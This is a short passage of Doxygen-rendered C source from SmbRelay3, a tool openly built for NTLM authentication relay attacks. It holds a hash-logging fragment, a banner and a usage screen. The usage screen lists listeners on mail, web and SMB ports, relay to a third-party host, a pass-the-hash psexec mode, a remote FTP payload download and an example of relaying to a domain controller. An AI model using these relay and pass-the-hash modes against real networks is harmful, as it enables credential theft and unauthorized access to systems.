00365                 for(i=0;i<24;i++) {sprintf(tmp,"%2.2x",p[i]); strcat(buffer,tmp); }
00366                 fwrite(buffer,strlen(buffer),1,LogFile);
00367                 fclose(LogFile);
00368 
00369 
00370 }
00371 
00372 
00373 void CleanLine(int verbose)
00374 {
00375  if (verbose>0) printf("\n"); 
00376  else printf("                                                                              \r");
00377 }
00378 
00379 
00380 void Banner(void)
00381 {
00382         printf("SmbRelay3 - NTLM Authentication replay attacks\n");
00383         printf(" (c) 2007 - 2008 Andres & Miguel Tarasco \n");
00384         printf(" Web Site - http://www.tarasco.org\n\n");
00385 }
00386 
00387 void usage(void){
00388 
00389         printf("Usage: SMBRelay3.exe <binding> [options]\n\n");
00390         printf("Binding Parameters:\n");
00391         printf("   --ListForSMBRequests         (Wait for incomming connections against port 445)\n");
00392         printf("   --ListForHTTPRequests        (Wait for incomming connections against port 80)\n");
00393         printf("   --ListForSMTPRequests        (Wait for incomming connections against port 25)\n");
00394         printf("   --ListForIMAPRequests        (Wait for incomming connections against port 143)\n");
00395         printf("   --ListForPOP3Requests        (Wait for incomming connections against port 110)\n");
00396         printf("   --psexec <host> <username> <password>  (psexec like tool)\n");
00397         printf("   --psexec <host> <username> <:NTLMHash> (psexec like tool)\n");
00398 
00399 
00400         printf("\nOptional Parameters\n");
00401 //    printf("   --ProxySMB                   (Force Challenge 0x1122334455667788 for cracking)\n");
00402         printf("   --AlternativeSrcPort <port>  (Listen under different Port)\n");
00403         printf("   --AlternativeDstPort <port>  (Connect to a different SMB Port)\n");
00404         printf("   --SMBDestinationHost <host>  (Replay attack against third part host)\n");
00405         printf("   --SrcHostname        <host>  (Spoof incoming client name for Win2k (default smbrelay)\n");
00406         
00407     printf("   --ftp <hostname> <port> <user> <pass> (download smrs.exe from remote ftp server)\n");
00408         printf("   --v[v]                       (Displays verbose information )\n");
00409 
00410         printf("\n");
00411         printf("Example: smrelay3.exe --ListForHTTPRequests --AlternativeSrcPort 8080 --SMBDestinationHost dc.mydomain.com\n");
00412         exit(1);
00413 }
00414 
00415
Generated on Wed Nov 12 22:04:28 2008 for Smbrelay version 3 by  doxygen 1.5.4